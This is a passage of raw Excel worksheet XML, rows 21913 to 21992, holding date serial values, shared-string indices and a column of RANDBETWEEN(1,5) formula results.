      <c r="A21913" s="1">
        <v>43061.890081018515</v>
      </c>
      <c r="C21913" t="s">
        <v>10</v>
      </c>
      <c r="D21913" t="s">
        <v>6</v>
      </c>
      <c r="E21913" s="2" t="s">
        <v>19767</v>
      </c>
      <c r="F21913">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21914" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21914" s="1">
        <v>43061.851238425923</v>
      </c>
      <c r="C21914" t="s">
        <v>80</v>
      </c>
      <c r="D21914" t="s">
        <v>336</v>
      </c>
      <c r="E21914" s="2" t="s">
        <v>19768</v>
      </c>
      <c r="F21914">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21915" s="1">
        <v>43061.739398148151</v>
      </c>
      <c r="C21915" t="s">
        <v>10</v>
      </c>
      <c r="D21915" t="s">
        <v>158</v>
      </c>
      <c r="E21915" t="s">
        <v>19769</v>
      </c>
      <c r="F21915">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21916" s="1">
        <v>43061.696087962962</v>
      </c>
      <c r="C21916" t="s">
        <v>6</v>
      </c>
      <c r="D21916" t="s">
        <v>821</v>
      </c>
      <c r="E21916" t="s">
        <v>19770</v>
      </c>
      <c r="F21916">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21917" s="1">
        <v>43061.635127314818</v>
      </c>
      <c r="C21917" t="s">
        <v>10</v>
      </c>
      <c r="D21917" t="s">
        <v>158</v>
      </c>
      <c r="E21917" t="s">
        <v>19771</v>
      </c>
      <c r="F21917">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21918" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21918" s="1">
        <v>43061.605358796296</v>
      </c>
      <c r="C21918" t="s">
        <v>10</v>
      </c>
      <c r="D21918" t="s">
        <v>23</v>
      </c>
      <c r="E21918" t="s">
        <v>19772</v>
      </c>
      <c r="F21918">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21919" s="1">
        <v>43061.600347222222</v>
      </c>
      <c r="C21919" t="s">
        <v>16</v>
      </c>
      <c r="E21919" t="s">
        <v>19773</v>
      </c>
      <c r="F21919">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21920" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21920" s="1">
        <v>43061.595960648148</v>
      </c>
      <c r="C21920" t="s">
        <v>10</v>
      </c>
      <c r="D21920" t="s">
        <v>192</v>
      </c>
      <c r="E21920" s="2" t="s">
        <v>19774</v>
      </c>
      <c r="F21920">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21921" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21921" s="1">
        <v>43061.584791666668</v>
      </c>
      <c r="C21921" t="s">
        <v>10</v>
      </c>
      <c r="D21921" t="s">
        <v>86</v>
      </c>
      <c r="E21921" s="2" t="s">
        <v>19775</v>
      </c>
      <c r="F21921">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21922" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21922" s="1">
        <v>43061.532800925925</v>
      </c>
      <c r="C21922" t="s">
        <v>173</v>
      </c>
      <c r="E21922" s="2" t="s">
        <v>19776</v>
      </c>
      <c r="F21922">
        <f t="shared" ca="1" si="342"/>
        <v>5</v>
      </c>
    </row>
    <row r="21923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21923" s="1">
        <v>43061.525972222225</v>
      </c>
      <c r="C21923" t="s">
        <v>48</v>
      </c>
      <c r="E21923" t="s">
        <v>19777</v>
      </c>
      <c r="F21923">
        <f t="shared" ca="1" si="342"/>
        <v>1</v>
      </c>
    </row>
    <row r="21924" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21924" s="1">
        <v>43061.515150462961</v>
      </c>
      <c r="C21924" t="s">
        <v>1501</v>
      </c>
      <c r="E21924" s="2" t="s">
        <v>19778</v>
      </c>
      <c r="F21924">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21925" s="1">
        <v>43061.502372685187</v>
      </c>
      <c r="C21925" t="s">
        <v>71</v>
      </c>
      <c r="E21925" t="s">
        <v>19779</v>
      </c>
      <c r="F21925">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21926" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21926" s="1">
        <v>43061.485034722224</v>
      </c>
      <c r="C21926" t="s">
        <v>16</v>
      </c>
      <c r="E21926" t="s">
        <v>19780</v>
      </c>
      <c r="F21926">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21927" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21927" s="1">
        <v>43061.444016203706</v>
      </c>
      <c r="C21927" t="s">
        <v>10</v>
      </c>
      <c r="D21927" t="s">
        <v>14</v>
      </c>
      <c r="E21927" t="s">
        <v>19781</v>
      </c>
      <c r="F21927">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21928" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21928" s="1">
        <v>43061.442199074074</v>
      </c>
      <c r="C21928" t="s">
        <v>69</v>
      </c>
      <c r="E21928" t="s">
        <v>19782</v>
      </c>
      <c r="F21928">
        <f t="shared" ca="1" si="342"/>
        <v>1</v>
      </c>
    </row>
    <row r="21929" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21929" s="1">
        <v>43061.441747685189</v>
      </c>
      <c r="C21929" t="s">
        <v>10</v>
      </c>
      <c r="D21929" t="s">
        <v>36</v>
      </c>
      <c r="E21929" t="s">
        <v>19783</v>
      </c>
      <c r="F21929">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21930" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21930" s="1">
        <v>43061.436226851853</v>
      </c>
      <c r="C21930" t="s">
        <v>48</v>
      </c>
      <c r="E21930" t="s">
        <v>19784</v>
      </c>
      <c r="F21930">
        <f t="shared" ca="1" si="342"/>
        <v>5</v>
      </c>
    </row>
    <row r="21931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21931" s="1">
        <v>43061.43540509259</v>
      </c>
      <c r="C21931" t="s">
        <v>69</v>
      </c>
      <c r="E21931" t="s">
        <v>19785</v>
      </c>
      <c r="F21931">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21932" s="1">
        <v>43061.431550925925</v>
      </c>
      <c r="C21932" t="s">
        <v>6</v>
      </c>
      <c r="D21932" t="s">
        <v>25</v>
      </c>
      <c r="E21932" t="s">
        <v>19786</v>
      </c>
      <c r="F21932">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21933" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21933" s="1">
        <v>43061.386886574073</v>
      </c>
      <c r="C21933" t="s">
        <v>6</v>
      </c>
      <c r="E21933" s="2" t="s">
        <v>19787</v>
      </c>
      <c r="F21933">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21934" s="1">
        <v>43061.383229166669</v>
      </c>
      <c r="C21934" t="s">
        <v>6</v>
      </c>
      <c r="D21934" t="s">
        <v>194</v>
      </c>
      <c r="E21934" t="s">
        <v>19788</v>
      </c>
      <c r="F21934">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21935" s="1">
        <v>43061.38009259259</v>
      </c>
      <c r="C21935" t="s">
        <v>173</v>
      </c>
      <c r="E21935" t="s">
        <v>19789</v>
      </c>
      <c r="F21935">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21936" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21936" s="1">
        <v>43061.363229166665</v>
      </c>
      <c r="C21936" t="s">
        <v>71</v>
      </c>
      <c r="E21936" t="s">
        <v>19790</v>
      </c>
      <c r="F21936">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21937" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A21937" s="1">
        <v>43061.324178240742</v>
      </c>
      <c r="C21937" t="s">
        <v>16</v>
      </c>
      <c r="E21937" s="2" t="s">
        <v>19791</v>
      </c>
      <c r="F21937">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21938" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A21938" s="1">
        <v>43061.308634259258</v>
      </c>
      <c r="C21938" t="s">
        <v>1050</v>
      </c>
      <c r="E21938" s="2" t="s">
        <v>19792</v>
      </c>
      <c r="F21938">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21939" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21939" s="1">
        <v>43061.292164351849</v>
      </c>
      <c r="C21939" t="s">
        <v>69</v>
      </c>
      <c r="E21939" s="2" t="s">
        <v>19793</v>
      </c>
      <c r="F21939">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21940" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A21940" s="1">
        <v>43061.250960648147</v>
      </c>
      <c r="C21940" t="s">
        <v>48</v>
      </c>
      <c r="E21940" s="2" t="s">
        <v>19794</v>
      </c>
      <c r="F21940">
        <f t="shared" ca="1" si="342"/>
        <v>5</v>
      </c>
    </row>
    <row r="21941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21941" s="1">
        <v>43061.243668981479</v>
      </c>
      <c r="C21941" t="s">
        <v>16</v>
      </c>
      <c r="E21941" t="s">
        <v>19795</v>
      </c>
      <c r="F21941">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21942" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21942" s="1">
        <v>43061.192118055558</v>
      </c>
      <c r="C21942" t="s">
        <v>10</v>
      </c>
      <c r="D21942" t="s">
        <v>46</v>
      </c>
      <c r="E21942" s="2" t="s">
        <v>19796</v>
      </c>
      <c r="F21942">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21943" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21943" s="1">
        <v>43061.159189814818</v>
      </c>
      <c r="C21943" t="s">
        <v>67</v>
      </c>
      <c r="D21943" t="s">
        <v>312</v>
      </c>
      <c r="E21943" s="2" t="s">
        <v>19797</v>
      </c>
      <c r="F21943">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21944" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21944" s="1">
        <v>43061.127962962964</v>
      </c>
      <c r="C21944" t="s">
        <v>559</v>
      </c>
      <c r="E21944" s="2" t="s">
        <v>19798</v>
      </c>
      <c r="F21944">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21945" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21945" s="1">
        <v>43061.06958333333</v>
      </c>
      <c r="C21945" t="s">
        <v>724</v>
      </c>
      <c r="E21945" s="2" t="s">
        <v>19799</v>
      </c>
      <c r="F21945">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21946" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21946" s="1">
        <v>43061.036944444444</v>
      </c>
      <c r="C21946" t="s">
        <v>71</v>
      </c>
      <c r="E21946" s="2" t="s">
        <v>19800</v>
      </c>
      <c r="F21946">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21947" s="1">
        <v>43060.9378125</v>
      </c>
      <c r="C21947" t="s">
        <v>139</v>
      </c>
      <c r="E21947" t="s">
        <v>19801</v>
      </c>
      <c r="F21947">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21948" s="1">
        <v>43060.812245370369</v>
      </c>
      <c r="C21948" t="s">
        <v>127</v>
      </c>
      <c r="D21948" t="s">
        <v>480</v>
      </c>
      <c r="E21948" t="s">
        <v>19802</v>
      </c>
      <c r="F21948">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21949" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21949" s="1">
        <v>43060.773981481485</v>
      </c>
      <c r="C21949" t="s">
        <v>10</v>
      </c>
      <c r="D21949" t="s">
        <v>6</v>
      </c>
      <c r="E21949" t="s">
        <v>19803</v>
      </c>
      <c r="F21949">
        <f t="shared" ca="1" si="342"/>
        <v>2</v>
      </c>
    </row>
    <row r="21950" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21950" s="1">
        <v>43060.736400462964</v>
      </c>
      <c r="C21950" t="s">
        <v>197</v>
      </c>
      <c r="E21950" s="2" t="s">
        <v>19804</v>
      </c>
      <c r="F21950">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21951" s="1">
        <v>43060.735219907408</v>
      </c>
      <c r="C21951" t="s">
        <v>686</v>
      </c>
      <c r="D21951" t="s">
        <v>46</v>
      </c>
      <c r="E21951" t="s">
        <v>19805</v>
      </c>
      <c r="F21951">
        <f t="shared" ca="1" si="342"/>
        <v>3</v>
      </c>
    </row>
    <row r="21952" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A21952" s="1">
        <v>43060.642175925925</v>
      </c>
      <c r="C21952" t="s">
        <v>10</v>
      </c>
      <c r="D21952" t="s">
        <v>251</v>
      </c>
      <c r="E21952" s="2" t="s">
        <v>19806</v>
      </c>
      <c r="F21952">
        <f t="shared" ca="1" si="342"/>
        <v>4</v>
      </c>
    </row>
    <row r="21953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21953" s="1">
        <v>43060.626620370371</v>
      </c>
      <c r="C21953" t="s">
        <v>10</v>
      </c>
      <c r="D21953" t="s">
        <v>251</v>
      </c>
      <c r="E21953" t="s">
        <v>19807</v>
      </c>
      <c r="F21953">
        <f t="shared" ca="1" si="342"/>
        <v>1</v>
      </c>
    </row>
    <row r="21954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21954" s="1">
        <v>43060.607523148145</v>
      </c>
      <c r="C21954" t="s">
        <v>10</v>
      </c>
      <c r="D21954" t="s">
        <v>46</v>
      </c>
      <c r="E21954" t="s">
        <v>19808</v>
      </c>
      <c r="F21954">
        <f t="shared" ref="F21954:F22017" ca="1" si="343">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="21955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21955" s="1">
        <v>43060.590069444443</v>
      </c>
      <c r="C21955" t="s">
        <v>6</v>
      </c>
      <c r="D21955" t="s">
        <v>25</v>
      </c>
      <c r="E21955" t="s">
        <v>19809</v>
      </c>
      <c r="F21955">
        <f t="shared" ca="1" si="343"/>
        <v>3</v>
      </c>
    </row>
    <row r="21956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21956" s="1">
        <v>43060.561331018522</v>
      </c>
      <c r="C21956" t="s">
        <v>16</v>
      </c>
      <c r="E21956" t="s">
        <v>19810</v>
      </c>
      <c r="F21956">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21957" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A21957" s="1">
        <v>43060.554884259262</v>
      </c>
      <c r="C21957" t="s">
        <v>173</v>
      </c>
      <c r="E21957" s="2" t="s">
        <v>19811</v>
      </c>
      <c r="F21957">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21958" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A21958" s="1">
        <v>43060.542094907411</v>
      </c>
      <c r="C21958" t="s">
        <v>48</v>
      </c>
      <c r="E21958" s="2" t="s">
        <v>19812</v>
      </c>
      <c r="F21958">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21959" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A21959" s="1">
        <v>43060.477858796294</v>
      </c>
      <c r="C21959" t="s">
        <v>6</v>
      </c>
      <c r="D21959" t="s">
        <v>25</v>
      </c>
      <c r="E21959" s="2" t="s">
        <v>19813</v>
      </c>
      <c r="F21959">
        <f t="shared" ca="1" si="343"/>
        <v>3</v>
      </c>
    </row>
    <row r="21960" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A21960" s="1">
        <v>43060.458773148152</v>
      </c>
      <c r="C21960" t="s">
        <v>10</v>
      </c>
      <c r="D21960" t="s">
        <v>244</v>
      </c>
      <c r="E21960" s="2" t="s">
        <v>19814</v>
      </c>
      <c r="F21960">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21961" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21961" s="1">
        <v>43060.426087962966</v>
      </c>
      <c r="C21961" t="s">
        <v>10</v>
      </c>
      <c r="D21961" t="s">
        <v>71</v>
      </c>
      <c r="E21961" t="s">
        <v>19815</v>
      </c>
      <c r="F21961">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21962" s="1">
        <v>43060.425578703704</v>
      </c>
      <c r="C21962" t="s">
        <v>10</v>
      </c>
      <c r="D21962" t="s">
        <v>36</v>
      </c>
      <c r="E21962" t="s">
        <v>19816</v>
      </c>
      <c r="F21962">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21963" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21963" s="1">
        <v>43060.423055555555</v>
      </c>
      <c r="C21963" t="s">
        <v>48</v>
      </c>
      <c r="E21963" s="2" t="s">
        <v>19817</v>
      </c>
      <c r="F21963">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21964" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21964" s="1">
        <v>43060.382418981484</v>
      </c>
      <c r="C21964" t="s">
        <v>1068</v>
      </c>
      <c r="E21964" t="s">
        <v>19818</v>
      </c>
      <c r="F21964">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21965" s="1">
        <v>43060.375752314816</v>
      </c>
      <c r="C21965" t="s">
        <v>10</v>
      </c>
      <c r="D21965" t="s">
        <v>163</v>
      </c>
      <c r="E21965" t="s">
        <v>19819</v>
      </c>
      <c r="F21965">
        <f t="shared" ca="1" si="343"/>
        <v>5</v>
      </c>
    </row>
    <row r="21966" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A21966" s="1">
        <v>43060.362557870372</v>
      </c>
      <c r="C21966" t="s">
        <v>65</v>
      </c>
      <c r="E21966" s="2" t="s">
        <v>19820</v>
      </c>
      <c r="F21966">
        <f t="shared" ca="1" si="343"/>
        <v>3</v>
      </c>
    </row>
    <row r="21967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21967" s="1">
        <v>43060.352164351854</v>
      </c>
      <c r="C21967" t="s">
        <v>10</v>
      </c>
      <c r="D21967" t="s">
        <v>494</v>
      </c>
      <c r="E21967" t="s">
        <v>19821</v>
      </c>
      <c r="F21967">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21968" s="1">
        <v>43060.327986111108</v>
      </c>
      <c r="C21968" t="s">
        <v>10</v>
      </c>
      <c r="D21968" t="s">
        <v>112</v>
      </c>
      <c r="E21968" t="s">
        <v>19822</v>
      </c>
      <c r="F21968">
        <f t="shared" ca="1" si="343"/>
        <v>3</v>
      </c>
    </row>
    <row r="21969" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A21969" s="1">
        <v>43060.309155092589</v>
      </c>
      <c r="C21969" t="s">
        <v>10</v>
      </c>
      <c r="D21969" t="s">
        <v>20</v>
      </c>
      <c r="E21969" s="2" t="s">
        <v>19823</v>
      </c>
      <c r="F21969">
        <f t="shared" ca="1" si="343"/>
        <v>5</v>
      </c>
    </row>
    <row r="21970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21970" s="1">
        <v>43060.281875000001</v>
      </c>
      <c r="C21970" t="s">
        <v>586</v>
      </c>
      <c r="E21970" t="s">
        <v>19824</v>
      </c>
      <c r="F21970">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21971" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21971" s="1">
        <v>43060.268391203703</v>
      </c>
      <c r="C21971" t="s">
        <v>1501</v>
      </c>
      <c r="E21971" s="2" t="s">
        <v>19825</v>
      </c>
      <c r="F21971">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21972" s="1">
        <v>43060.26766203704</v>
      </c>
      <c r="C21972" t="s">
        <v>1501</v>
      </c>
      <c r="E21972" t="s">
        <v>19826</v>
      </c>
      <c r="F21972">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21973" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21973" s="1">
        <v>43060.264791666668</v>
      </c>
      <c r="C21973" t="s">
        <v>41</v>
      </c>
      <c r="E21973" s="2" t="s">
        <v>19827</v>
      </c>
      <c r="F21973">
        <f t="shared" ca="1" si="343"/>
        <v>5</v>
      </c>
    </row>
    <row r="21974" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A21974" s="1">
        <v>43060.231273148151</v>
      </c>
      <c r="C21974" t="s">
        <v>41</v>
      </c>
      <c r="E21974" s="2" t="s">
        <v>19828</v>
      </c>
      <c r="F21974">
        <f t="shared" ca="1" si="343"/>
        <v>5</v>
      </c>
    </row>
    <row r="21975" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21975" s="1">
        <v>43060.228275462963</v>
      </c>
      <c r="C21975" t="s">
        <v>318</v>
      </c>
      <c r="E21975" s="2" t="s">
        <v>19829</v>
      </c>
      <c r="F21975">
        <f t="shared" ca="1" si="343"/>
        <v>5</v>
      </c>
    </row>
    <row r="21976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21976" s="1">
        <v>43060.224363425928</v>
      </c>
      <c r="C21976" t="s">
        <v>48</v>
      </c>
      <c r="E21976" t="s">
        <v>19830</v>
      </c>
      <c r="F21976">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21977" s="1">
        <v>43060.122499999998</v>
      </c>
      <c r="C21977" t="s">
        <v>229</v>
      </c>
      <c r="E21977" t="s">
        <v>19831</v>
      </c>
      <c r="F21977">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21978" s="1">
        <v>43060.104675925926</v>
      </c>
      <c r="C21978" t="s">
        <v>41</v>
      </c>
      <c r="E21978" t="s">
        <v>19832</v>
      </c>
      <c r="F21978">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21979" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A21979" s="1">
        <v>43060.089016203703</v>
      </c>
      <c r="C21979" t="s">
        <v>50</v>
      </c>
      <c r="E21979" s="2" t="s">
        <v>19833</v>
      </c>
      <c r="F21979">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21980" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21980" s="1">
        <v>43060.064039351855</v>
      </c>
      <c r="C21980" t="s">
        <v>139</v>
      </c>
      <c r="E21980" s="2" t="s">
        <v>19834</v>
      </c>
      <c r="F21980">
        <f t="shared" ca="1" si="343"/>
        <v>3</v>
      </c>
    </row>
    <row r="21981" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A21981" s="1">
        <v>43059.911620370367</v>
      </c>
      <c r="C21981" t="s">
        <v>253</v>
      </c>
      <c r="E21981" s="2" t="s">
        <v>19835</v>
      </c>
      <c r="F21981">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21982" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21982" s="1">
        <v>43059.88009259259</v>
      </c>
      <c r="C21982" t="s">
        <v>140</v>
      </c>
      <c r="D21982" t="s">
        <v>141</v>
      </c>
      <c r="E21982" s="2" t="s">
        <v>19836</v>
      </c>
      <c r="F21982">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21983" s="1">
        <v>43059.775706018518</v>
      </c>
      <c r="C21983" t="s">
        <v>10</v>
      </c>
      <c r="D21983" t="s">
        <v>6</v>
      </c>
      <c r="E21983" t="s">
        <v>19837</v>
      </c>
      <c r="F21983">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21984" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21984" s="1">
        <v>43059.771215277775</v>
      </c>
      <c r="C21984" t="s">
        <v>10</v>
      </c>
      <c r="D21984" t="s">
        <v>158</v>
      </c>
      <c r="E21984" t="s">
        <v>19838</v>
      </c>
      <c r="F21984">
        <f t="shared" ca="1" si="343"/>
        <v>2</v>
      </c>
    </row>
    <row r="21985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21985" s="1">
        <v>43059.747812499998</v>
      </c>
      <c r="C21985" t="s">
        <v>6</v>
      </c>
      <c r="D21985" t="s">
        <v>114</v>
      </c>
      <c r="E21985" t="s">
        <v>19839</v>
      </c>
      <c r="F21985">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21986" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A21986" s="1">
        <v>43059.746874999997</v>
      </c>
      <c r="C21986" t="s">
        <v>173</v>
      </c>
      <c r="D21986" t="s">
        <v>7</v>
      </c>
      <c r="E21986" s="2" t="s">
        <v>19840</v>
      </c>
      <c r="F21986">
        <f t="shared" ca="1" si="343"/>
        <v>3</v>
      </c>
    </row>
    <row r="21987" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A21987" s="1">
        <v>43059.743391203701</v>
      </c>
      <c r="C21987" t="s">
        <v>454</v>
      </c>
      <c r="D21987" t="s">
        <v>23</v>
      </c>
      <c r="E21987" s="2" t="s">
        <v>19841</v>
      </c>
      <c r="F21987">
        <f t="shared" ca="1" si="343"/>
        <v>1</v>
      </c>
    </row>
    <row r="21988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21988" s="1">
        <v>43059.726990740739</v>
      </c>
      <c r="C21988" t="s">
        <v>10</v>
      </c>
      <c r="D21988" t="s">
        <v>6</v>
      </c>
      <c r="E21988" t="s">
        <v>19842</v>
      </c>
      <c r="F21988">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21989" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A21989" s="1">
        <v>43059.675833333335</v>
      </c>
      <c r="C21989" t="s">
        <v>48</v>
      </c>
      <c r="E21989" s="2" t="s">
        <v>19843</v>
      </c>
      <c r="F21989">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21990" s="1">
        <v>43059.661620370367</v>
      </c>
      <c r="C21990" t="s">
        <v>10</v>
      </c>
      <c r="D21990" t="s">
        <v>56</v>
      </c>
      <c r="E21990" t="s">
        <v>19844</v>
      </c>
      <c r="F21990">
        <f t="shared" ca="1" si="343"/>
        <v>4</v>
      </c>
    </row>
    <row r="21991" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21991" s="1">
        <v>43059.649004629631</v>
      </c>
      <c r="C21991" t="s">
        <v>10</v>
      </c>
      <c r="D21991" t="s">
        <v>6</v>
      </c>
      <c r="E21991" t="s">
        <v>19845</v>
      </c>
      <c r="F21991">
        <f t="shared" ca="1" si="343"/>
        <v>5</v>
      </c>
    </row>
    <row r="21992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A21992" s="1">
        <v>43059.643819444442</v>
      </c>
      <c r="C21992" t="s">
        <v>10</v>
      </c>
